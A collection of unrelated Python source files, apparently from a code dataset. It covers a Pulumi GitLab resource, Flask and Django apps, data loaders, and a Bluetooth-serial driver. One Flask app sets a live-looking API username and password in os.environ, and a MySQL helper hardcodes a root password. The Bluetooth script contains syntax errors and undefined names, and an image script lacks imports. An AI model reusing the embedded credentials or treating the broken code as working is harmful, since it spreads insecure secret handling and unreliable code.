return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_id", value)
class UserGpgKey(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
key: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----\"\"\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----\"\"\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: UserGpgKeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----\"\"\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----\"\"\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
key: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None,
__props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)
if key is None and not opts.urn:
raise TypeError("Missing required property 'key'")
__props__.__dict__["key"] = key
__props__.__dict__["user_id"] = user_id
__props__.__dict__["created_at"] = None
__props__.__dict__["key_id"] = None
super(UserGpgKey, __self__).__init__(
'gitlab:index/userGpgKey:UserGpgKey',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
created_at: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
key_id: Optional[pulumi.Input[int]] = None,
user_id: Optional[pulumi.Input[int]] = None) -> 'UserGpgKey':
"""
Get an existing UserGpgKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)
__props__.__dict__["created_at"] = created_at
__props__.__dict__["key"] = key
__props__.__dict__["key_id"] = key_id
__props__.__dict__["user_id"] = user_id
return UserGpgKey(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> pulumi.Output[str]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter
def key(self) -> pulumi.Output[str]:
"""
The armored GPG public key.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter(name="keyId")
def key_id(self) -> pulumi.Output[int]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, "key_id")
@property
@pulumi.getter(name="userId")
def user_id(self) -> pulumi.Output[Optional[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, "user_id")
|
2,951 | 613b060ee50b49417342cfa70b36f77d112dcc58 | from collections import Counter
import pandas as pd
import string
from collections import namedtuple, defaultdict
import csv
import sys
import torch
import numpy as np
from sklearn.preprocessing import LabelEncoder
from scipy.sparse import coo_matrix
from tqdm import tqdm
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device = 'cpu'
def get_data():
df = pd.read_csv("./data/filteredCorpus.csv")
df_filt = df[df['outcome']==True] # use only successful games
df_filt = df_filt[df_filt['role']=='speaker'] # use speaker utterances
df_filt = df_filt[df_filt['source']=='human'] # use speaker utterances
# making a list of utterances that we want to use, so we can take these rows from df_filt
utt = df_filt['contents']
utt_filt = [u.lower() for u in utt if len(u.split()) == 1] # only use one word utterances
utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for u in utt_filt] # remove punctuation
utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys()) # use utterances that appear more than once
# df_filt = df_filt[df_filt['numCleanWords'] == 1]
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(str.maketrans('', '', string.punctuation)))# filter to take out punctuation
df_final = df.loc[df['contents'].isin(utt_final)] # this is the dataset of all the games that we want to use
le = LabelEncoder()
df_final['contents'] = le.fit_transform(df_final['contents'])
return df_final, le
def get_meaning_matrix(df):
df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))
df['colors'] = df['colors'].apply(lambda x: str(x))
colors_le = LabelEncoder()
df['colors'] = colors_le.fit_transform(df['colors']) # 100 x 100 (test data)
print("length colors and contents", len(df['colors']), len(df['contents']))
print("set colors and contents", len(set(df['colors'])), len(set(df['contents'])))
meaning_mat = pd.crosstab(df['colors'], df['contents']) # rows are colors, columns are utterances
# row numbers and column numbers correspond to labels from colors_le and le (utterances) from get_data()
meaning_mat = np.array(meaning_mat) # a num_color x num_utterances matrix
for i in range(len(meaning_mat[:,0])):
if sum(meaning_mat[i,:]) == 0:
print("meaning mat is 0 for this row: ", i)
for j in range(len(meaning_mat[0,:])):
if meaning_mat[i,j] == 0:
print("meaning mat is 0 at: ", i,j," !!!")
return meaning_mat, colors_le
# Literal listener data function
def get_pragmatic_listener_testing_data(df):
output = []
all_utt = list(set(list(df['contents'])))
desc_to_idx = {u: i for i,u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)
colors = (correct, alt1, alt2)
# idxs = random.choice([0,1,2]) # randomly permute colors
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes
output.append((correct_idx, colors_shuff, utt))
return output, all_utt, desc_to_idx # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc
# return all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc
def get_literal_listener_training_data(df):
output = []
all_utt = df['contents']
idx_to_desc = {i: u for i,u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)
colors = (correct, alt1, alt2)
# idxs = random.choice([0,1,2]) # randomly permute colors
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes
output.append((correct_idx, colors_shuff, utt))
return output#, all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc
# Literal Speaker data function - hi r u ok
def get_literal_speaker_training_data(df):
output = []
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents'], dtype=torch.long).to(device)
color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32).to(device)
output.append([color, utt])
return output # [referent, utterance_idx]
|
2,952 | 6d974580ff546bda17caa1e61e2621b4bc705f3f | from flask import jsonify
from flask_restful import Resource
from flask_apispec.views import MethodResource
import pandas as pd
import jellyfish
df = pd.read_csv('data/trancotop1m.csv')
df_dict = df.to_dict('records')
class StrComparison(MethodResource,Resource):
# @requires_auth
def get(self, domain):
domain_found = ""
similar = False
for row in df_dict:
result = jellyfish.jaro_winkler_similarity(str(row['domain']), str(domain))
if result > 0.97:
similar = True
break
detail = "Found near domain by distance string comparison: " + str(result) if similar else "Not similar domain found."
domain_found = str(row['domain']) if similar else ""
return jsonify({"feature": "strcomparison", "domain": domain, "result": domain_found, "detail": detail}) |
2,953 | 7bcbcbe51217b2ea9044a7e4a4bebf315069c92d | """
Create a function that takes two number strings and returns their sum as a string.
Examples
add("111", "111") ➞ "222"
add("10", "80") ➞ "90"
add("", "20") ➞ "Invalid Operation"
Notes
If any input is "" or None, return "Invalid Operation".
"""
def add(n1, n2):
if n1 == "" or n2 == "":
return "Invalid Operation"
elif n1 == None or n2 == None:
return "Invalid Operation"
return str(int(n1) + int(n2))
print(add("111", "111"))
print(type(add("111", "111")))
|
2,954 | f5b8d8c291d18c6f320704a89985acbcae97ca2f | from ImageCoord import ImageCoord
import os
import sys
from folium.features import DivIcon
# Chemin du dossier ou l'on recupere les images
racine = tkinter.Tk()
racine.title("listPhoto")
racine.directory = filedialog.askdirectory()
cheminDossier = racine.directory
dirImage = os.listdir(cheminDossier)
listImage = []
# Parcour du dossier d'images
for index in range(0,len(dirImage)) :
#parcours du dossier
img = ImageCoord(cheminDossier + '\\' + dirImage[index])
#Insertion des image avec coordonné
if img.has_coord() :
listImage.append(img)
# Tri des images
listImage.sort()
|
2,955 | bce794616889b80c152a8ebec8d02e49a96684e9 | import csv, io
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.decorators import permission_required
from django.views import generic
from itertools import chain
from .models import Player, League, Team
class IndexView(generic.ListView):
template_name = 'players/players.html'
context_object_name = 'players'
def get_queryset(self):
return list(chain(Player.objects.all(), Player._meta.get_fields()))
def rate(stats):
sum = 0.
sum += float(stats[4]) / float(stats[3]) * 90 / 30
sum += float(stats[5]) / float(stats[3]) * 90 / 40
sum += float(stats[6]) / float(stats[3]) * 90 / 2
sum += float(stats[7]) / float(stats[3]) * 90 / 1
sum += float(stats[8]) / float(stats[3]) * 90 / 3
sum += float(stats[9]) / float(stats[3]) * 90 / 1.5
sum += float(stats[10]) / float(stats[3]) * 90 / 5
sum -= float(stats[11]) / float(stats[3]) * 90 / 1.2
sum -= float(stats[12]) / float(stats[3]) * 90 / 0.5
sum -= float(stats[13]) / float(stats[3]) * 90 / 1.5
sum += float(stats[14]) / float(stats[3]) * 90 / 0.5
sum += float(stats[15]) / float(stats[3]) * 90 / 11
sum += float(stats[16]) / float(stats[3]) * 90 / 4
sum += float(stats[17]) / float(stats[3]) * 90 / 1
sum += float(stats[18]) / float(stats[3]) * 90 / 2
sum += float(stats[19]) / float(stats[3]) * 90 / 1
sum += float(stats[20]) / float(stats[3]) * 90 / 1
sum += float(stats[21]) / float(stats[3]) * 90 / 1
sum += float(stats[22]) / float(stats[3]) * 90 / 2.5
sum += float(stats[23]) / float(stats[3]) * 90 / 1
sum += float(stats[24]) / float(stats[3]) * 90 / 2
sum += float(stats[25]) / float(stats[3]) * 90 / 1
sum += float(stats[26]) / float(stats[3]) * 90 / 5
sum += float(stats[27]) / float(stats[3]) * 90 / 0.5
sum += float(stats[28]) / float(stats[3]) * 90 / 10
return sum
@permission_required('admin.can_addlog_entry')
def player_upload(request):
template = 'players/player_upload.html'
prompt = {
'order': ''
}
if request.method == "GET":
return render(request, template, prompt)
csv_file = request.FILES['file']
if not csv_file.name.endswith('.csv'):
messages.error(request, 'This is not a csv file')
data_set = csv_file.read().decode('UTF-8')
io_string = io.StringIO(data_set)
next(io_string)
for column in csv.reader(io_string, delimiter=':', quotechar='|'):
for i, stat in enumerate(column):
if i in [0, 1]:
continue
column[i] = column[i].replace('Åš', 'Ś')
column[i] = column[i].replace(',', '.')
column[i] = column[i].replace('km', '')
column[i] = column[i].replace('Â\xa0', '')
column[i] = column[i].replace('-', '0')
if int(column[3]) < 180:
continue
if column[32] == '0':
continue
if not League.objects.filter(name=column[32]):
League.objects.update_or_create(
name=column[32]
)
if not Team.objects.filter(name=column[31]):
Team.objects.update_or_create(
league_id=League.objects.filter(name=column[32])[0].id,
name=column[31]
)
_, created = Player.objects.update_or_create(
team_id=2,
name=column[0],
age=column[2],
position=column[1],
minutes=column[3],
accurate_passes=float(column[4])/float(column[3])*90,
passes=float(column[5])/float(column[3])*90,
created_situations=float(column[6])/float(column[3])*90,
key_passes=float(column[7])/float(column[3])*90,
dribble=float(column[8])/float(column[3])*90,
fouls_on=float(column[9])/float(column[3])*90,
offsides=float(column[10])/float(column[3])*90,
mistakes=float(column[11])/float(column[3])*90,
culpable_goals=float(column[12])/float(column[3])*90,
accurate_cross=float(column[13])/float(column[3])*90,
assists=float(column[14])/float(column[3])*90,
heads=float(column[15])/float(column[3])*90,
tackles=float(column[16])/float(column[3])*90,
key_heads=float(column[17])/float(column[3])*90,
interceptions=float(column[18])/float(column[3])*90,
catch_saves=float(column[19])/float(column[3])*90,
saves=float(column[20])/float(column[3])*90,
saves_on_corner=float(column[21])/float(column[3])*90,
complete_tackles=float(column[22])/float(column[3])*90,
accurate_shots=float(column[23])/float(column[3])*90,
shots=float(column[24])/float(column[3])*90,
key_tackles=float(column[25])/float(column[3])*90,
win_heads=float(column[26])/float(column[3])*90,
goals=float(column[27])/float(column[3])*90,
crosses=float(column[28])/float(column[3])*90,
rating=float(column[29]),
club=column[31],
league=column[32],
rate=rate(column)
)
context = {}
return render(request, template, context)
@permission_required('admin.can_addlog_entry')
def player_delete(request):
Player.objects.all().delete()
return redirect('player_upload')
@permission_required('admin.can_addlog_entry')
def player_club_delete(request, club):
Player.objects.filter(club=club).delete()
return redirect('players')
@permission_required('admin.can_addlog_entry')
def player_league_delete(request, league):
Player.objects.filter(league=league).delete()
return redirect('players')
|
2,956 | 3146775c466368c25c92bd6074abb97408533500 | import logging
loggers = {}
def create_logger(
log_level:str ='INFO',
log_name:str = 'logfile',
export_log: bool = True,
save_dir:str = ''):
if log_name in loggers.keys():
logger = loggers.get(log_name)
else:
# create logger
logger = logging.getLogger(log_name)
logger.setLevel(logging.DEBUG)
# create console handler and set level to debug
handler1 = logging.StreamHandler()
handler1.setLevel(log_level)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
handler1.setFormatter(formatter)
# add ch to logger
logger.addHandler(handler1)
if export_log:
pathname = log_name
if len(save_dir)>0:
pathname = f'{save_dir}/{pathname}'
handler2 = logging.FileHandler(filename=f'{pathname}.log', mode='w')
handler2.setLevel('DEBUG')
handler2.setFormatter(formatter)
logger.addHandler(handler2)
loggers[log_name] = logger
return logger
|
2,957 | 6cb97e6f3c7ba312ec1458fd51635508a16f70dd | from mysql import connector
def get_db_connection():
try:
return connector.connect(host="server_database_1", user="root", password="password1234", database="SMARTHOUSE")
except connector.errors.DatabaseError:
connection = connector.connect(host="server_database_1", user="root", password="password1234")
cursor = connection.cursor()
cursor.execute("CREATE DATABASE SMARTHOUSE")
return get_db_connection()
|
2,958 | 919f1746bfdec61f5e81e6ce0e17bb3bf040230a | # square environment. there are the wall at the edge
from environment import super_environment
class SquareNormal(super_environment.Environment):
def __init__(self, size_x, size_y):
super().__init__(size_x, size_y)
@staticmethod
def environment_type():
return 'square'
def get_converted_position(self, position_before, position_after, radius):
# return the able position.if the position over the edge wall it is impossible.
x = position_after[0]
if x < radius:
x = radius
elif x + radius > self.screen_size_x:
x = self.screen_size_x - radius
y = position_after[1]
if y < radius:
y = radius
elif y > self.screen_size_y - radius:
y = self.screen_size_y - radius
return x, y
|
2,959 | d9bdf466abecb50c399556b99b41896eead0cb4b | from flask import Flask, request, g
from flask_restful import Resource, Api
from sqlalchemy import create_engine
from flask import jsonify
import json
import eth_account
import algosdk
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm import load_only
from datetime import datetime
import sys
from models import Base, Order, Log
engine = create_engine('sqlite:///orders.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
app = Flask(__name__)
# These decorators allow you to use g.session to access the database inside the request code
# g is an "application global" https://flask.palletsprojects.com/en/1.1.x/api/#application-globals
@app.before_request
def create_session():
g.session = scoped_session(DBSession)
@app.teardown_appcontext
# def shutdown_session(response_or_exc):
def shutdown_session(exception=None):
sys.stdout.flush()
g.session.commit()
g.session.remove()
""" Suggested helper methods """
# check whether “sig” is a valid signature of json.dumps(payload),
# using the signature algorithm specified by the platform field.
# Be sure to verify the payload using the sender_pk.
def check_sig(payload,sig):
pk = payload['sender_pk']
platform = payload['platform']
payload_json = json.dumps(payload)
result = False
if platform == "Algorand":
print("Algorand")
if algosdk.util.verify_bytes(payload_json.encode('utf-8'), sig, pk):
print("Algo sig verifies!")
result = True
elif platform == "Ethereum":
print("Ethereum")
eth_encoded_msg = eth_account.messages.encode_defunct(text=payload_json)
if eth_account.Account.recover_message(eth_encoded_msg, signature=sig) == pk:
print("Eth sig verifies!")
result = True
return result, payload_json
# def fill_order(order,txes=[]):
# pass
# the inner recursive function
def fill_order():
# get the order you just inserted from the DB
current_order = g.session.query(Order).order_by(Order.id.desc()).first()
# print("_order_id")
# print(current_order.id)
# Check if there are any existing orders that match and add them into a list
order_list = []
orders = g.session.query(Order).filter(Order.filled == None).all()
for existing_order in orders:
# if ((existing_order.buy_amount != 0) and (current_order.sell_amount != 0)):
if ((existing_order.buy_currency == current_order.sell_currency)
and (existing_order.sell_currency == current_order.buy_currency)
and (existing_order.sell_amount / existing_order.buy_amount
>= current_order.buy_amount / current_order.sell_amount)
and (existing_order.counterparty_id == None)):
order_list.append(existing_order)
# If a match is found between order and existing_order
if (len(order_list) > 0):
# print(" order_list_length")
# print(len(order_list))
# pick the first one in the list
match_order = order_list[0]
# Set the filled field to be the current timestamp on both orders
# Set counterparty_id to be the id of the other order
match_order.filled = datetime.now()
current_order.filled = datetime.now()
match_order.counterparty_id = current_order.id
current_order.counterparty_id = match_order.id
g.session.commit()
# if both orders can completely fill each other
# no child order needs to be generated
# If match_order is not completely filled
if (current_order.sell_amount < match_order.buy_amount):
# print("_match_order is not completely filled")
diff = match_order.buy_amount - current_order.sell_amount
exchange_rate_match = match_order.sell_amount / match_order.buy_amount
sell_amount_new_match = diff * exchange_rate_match
# print(match_order.id)
# print(diff)
# print(sell_amount_new_match)
new_order = Order(sender_pk=match_order.sender_pk,
receiver_pk=match_order.receiver_pk,
buy_currency=match_order.buy_currency,
sell_currency=match_order.sell_currency,
buy_amount=diff,
sell_amount=sell_amount_new_match,
creator_id=match_order.id)
g.session.add(new_order)
g.session.commit()
print("M")
fill_order()
# If current_order is not completely filled
if (current_order.buy_amount > match_order.sell_amount):
# print("_current_order is not completely filled")
diff = current_order.buy_amount - match_order.sell_amount
exchange_rate_current = current_order.buy_amount / current_order.sell_amount
sell_amount_new_current = diff / exchange_rate_current
# print(current_order.id)
# print(diff)
# print(sell_amount_new_current)
new_order = Order(sender_pk=current_order.sender_pk,
receiver_pk=current_order.receiver_pk,
buy_currency=current_order.buy_currency,
sell_currency=current_order.sell_currency,
buy_amount=diff,
sell_amount=sell_amount_new_current,
creator_id=current_order.id)
g.session.add(new_order)
g.session.commit()
print("C")
fill_order()
# Takes input dictionary d and writes it to the Log table
# Hint: use json.dumps or str() to get it in a nice string form
def log_message(d):
create_session()
order_obj = Log(message=d)
g.session.add(order_obj)
shutdown_session()
# convert a row in DB into a dict
def row2dict(row):
return {
c.name: getattr(row, c.name)
for c in row.__table__.columns
}
# print a dictionary nicely
def print_dict(d):
for key, value in d.items():
print(key, ' : ', value)
""" End of helper methods """
@app.route('/trade', methods=['POST'])
def trade():
print("In trade endpoint")
if request.method == "POST":
print("--------- trade ---------")
content = request.get_json(silent=True)
print( f"content = {json.dumps(content)}" )
columns = [ "sender_pk", "receiver_pk", "buy_currency", "sell_currency", "buy_amount", "sell_amount", "platform" ]
fields = [ "sig", "payload" ]
# check whether the input contains both "sig" and "payload"
for field in fields:
if not field in content.keys():
print( f"{field} not received by Trade" )
print( json.dumps(content) )
log_message(content)
return jsonify( False )
# check whether the input contains all 7 fields of payload
for column in columns:
if not column in content['payload'].keys():
print( f"{column} not received by Trade" )
print( json.dumps(content) )
log_message(content)
return jsonify( False )
#Your code here
#Note that you can access the database session using g.session
# TODO 1: Check the signature
# extract contents from json
sig = content['sig']
payload = content['payload']
platform = payload['platform']
# The platform must be either “Algorand” or "Ethereum".
platforms = ["Algorand", "Ethereum"]
if not platform in platforms:
print("input platform is not Algorand or Ethereum")
return jsonify(False)
# check signature
check_result = check_sig(payload,sig)
result = check_result[0]
payload_json = check_result[1]
# TODO 2: Add the order to the database
# TODO 4: Be sure to return jsonify(True) or jsonify(False) depending on if the method was successful
# If the signature does not verify, do not insert the order into the “Order” table.
# Instead, insert a record into the “Log” table, with the message field set to be json.dumps(payload).
if result is False:
print("signature does NOT verify")
log_message(payload_json)
return jsonify(result)
# If the signature verifies, store the signature,
# as well as all of the fields under the ‘payload’ in the “Order” table EXCEPT for 'platform’.
if result is True:
print("signature verifies")
create_session()
order_obj = Order(sender_pk=payload['sender_pk'],
receiver_pk=payload['receiver_pk'],
buy_currency=payload['buy_currency'],
sell_currency=payload['sell_currency'],
buy_amount=payload['buy_amount'],
sell_amount=payload['sell_amount'],
signature=sig)
g.session.add(order_obj)
# TODO 3: Fill the order
fill_order()
shutdown_session()
return jsonify(result)
@app.route('/order_book')
def order_book():
#Your code here
#Note that you can access the database session using g.session
# The “/order_book” endpoint should return a list of all orders in the database.
# The response should contain a single key “data” that refers to a list of orders formatted as JSON.
# Each order should be a dict with (at least) the following fields
# ("sender_pk", "receiver_pk", "buy_currency", "sell_currency", "buy_amount", "sell_amount", “signature”).
print("--------- order_book ---------")
create_session()
# get orders from DB into a list
order_dict_list = [
row2dict(order)
for order in g.session.query(Order).all()
]
# add the list into a dict
result = {
'data': order_dict_list
}
print("order book length: ")
print(len(order_dict_list))
# print_dict(order_dict_list[-2])
# print_dict(order_dict_list[-1])
shutdown_session()
return jsonify(result)
if __name__ == '__main__':
app.run(port='5002')
|
2,960 | 7c53c7bec6b6b2d4d6be89b750eeef83ca9115cc | from typing import List
class CourseSchedule:
"""
Problem: Course Schedule (#207)
Key Insights:
1. Create adjaceny list of courses to prerequisites.
2. Use DFS and visited set to detect a cycle. If there is a cycle, cannot finish all the courses.
3. Remember to remove a course (node) from visited set if that course is "cleared" (able to take the course).
4. Note that this is not a cycle (so if don't remove node in step 3, would incorrectly identify this as a cycle):
1 -> 2 -> 3
2 -> 4 -> 3
More info:
1. Concept of Topological order: for an edge uv, u must always come before v (so no cycles where v also comes before u)
Time Complexity:
O(V + E):
1. Create pre_map: O(P), P: prerequisites
a. We're iterating through the list of prereqs
2. Call dfs: O(C), C: courses
a. We're iterating through all the courses once
3. dfs: O(V + E)
a. We visit each course and each edge at most once
Space Complexity: O(V + E)
1. Create pre_map: O(V + E), V: courses, E: prereqs
2. dfs call stack: O(V + E)
"""
def can_finish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:
pre_map = { i:[] for i in range(numCourses) }
for crs, pre in prerequisites:
pre_map[crs].append(pre)
visited_set = set()
def dfs(crs):
if crs in visited_set:
return False
if pre_map[crs] == []:
return True
visited_set.add(crs)
for pre in pre_map[crs]:
if not dfs(pre):
return False
visited_set.remove(crs)
pre_map[crs] = []
return True
for crs in range(numCourses):
if not dfs(crs):
return False
return True
|
2,961 | d0f2d47a786b85367f96897e7cd8c2ef8c577e2b | import datetime
from flask import Flask, render_template, request
import database
import database1
import database2
import getYoutubeVideoLinks as getYT
import os
os.environ["EAI_USERNAME"] = 'pitabi1360@pashter.com'
os.environ["EAI_PASSWORD"] = 'Testqwerty1!'
from expertai.nlapi.cloud.client import ExpertAiClient
client = ExpertAiClient()
# Output overall sentiment
app = Flask(__name__)
database.create_tables()
database1.create_table()
database2.create_tablee()
language= 'en'
videos = []
@app.route("/", methods=["GET", "POST"])
def home():
if request.method == "POST":
entry_content = request.form.get("content")
output = client.specific_resource_analysis(body={"document": {"text": entry_content}}, params={'language': language, 'resource': 'relevants'})
database2.create_entryss(entry_content, datetime.datetime.today().strftime("%b %d"))
for lemma in output.main_lemmas:
print(lemma.value)
video = getYT.searchVideoForKeyword(lemma.value)
for indivvideo in video:
database.create_entry(entry_content, datetime.datetime.today().strftime("%b %d"), indivvideo)
videos.append(f'{indivvideo}')
return render_template("home.html")
@app.route("/feedback", methods=["GET", "POST"])
def feedback():
if request.method == "POST":
entry_contents = request.form.get("contents")
output = client.specific_resource_analysis(body={"document": {"text": entry_contents}},params={'language': language, 'resource': 'sentiment'})
database1.create_entrys(entry_contents, datetime.datetime.today().strftime("%b %d"), output.sentiment.overall)
print(output.sentiment.overall)
return render_template("feedback.html")
@app.route("/recommendation", methods=["GET", "POST"])
def recommendation():
return render_template('index.html', videos=videos, entries=database.retrieve_entries(), entrie=database2.retrieve_entriee())
@app.route('/negative', methods=["GET", "POST"])
def negative():
return render_template("negative.html", entries=database1.retrieve_entrie())
@app.route('/positive', methods=["GET", "POST"])
def positive():
return render_template("positive.html", entries=database1.retrieve_entrie())
|
2,962 | 605c78795b5a072d330d44a150f26ad410d9d084 | import bluetooth
import serial
import struct
# Definition of Bluetooth rfcomm socket
bd_addr = "98:D3:37:00:8D:39" # The address from the HC-05 sensor
port = 1
sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
sock.connect((bd_addr,port))
# Definition of Serial port
ser = serial.Serial("/dev/ttyACM0", 57600)
def BT_DRIVING():
while True:
data = ord(sock.recv(1024))
String = ' '
String = struct.pack('!B',data)
ser.write(string)
def BT_SIGNAL():
while True:
data = ord(sock.recv(1024))
String = ' '
String = struct.pack('!B', data)
if String == 24:
return 24
elif String = 25:
return 25:
def FR30():
string = 10
string = struct.pack('!B',string)
ser.write(string)
def FR15():
string = 11
string = struct.pack('!B',string)
ser.write(string)
def FS00():
string = 12
string = struct.pack('!B',string)
ser.write(string)
def FL15():
string = 13
string = struct.pack('!B',string)
ser.write(string)
def FL30():
string = 14
string = struct.pack('!B',string)
ser.write(string)
def HR30():
string = 15
string = struct.pack('!B',string)
ser.write(string)
def HR15():
string = 16
string = struct.pack('!B',string)
ser.write(string)
def HS00():
string = 17
string = struct.pack('!B',string)
ser.write(string)
def HL15():
string = 18
string = struct.pack('!B',string)
ser.write(string)
def HL30():
string = 19
string = struct.pack('!B',string)
ser.write(string)
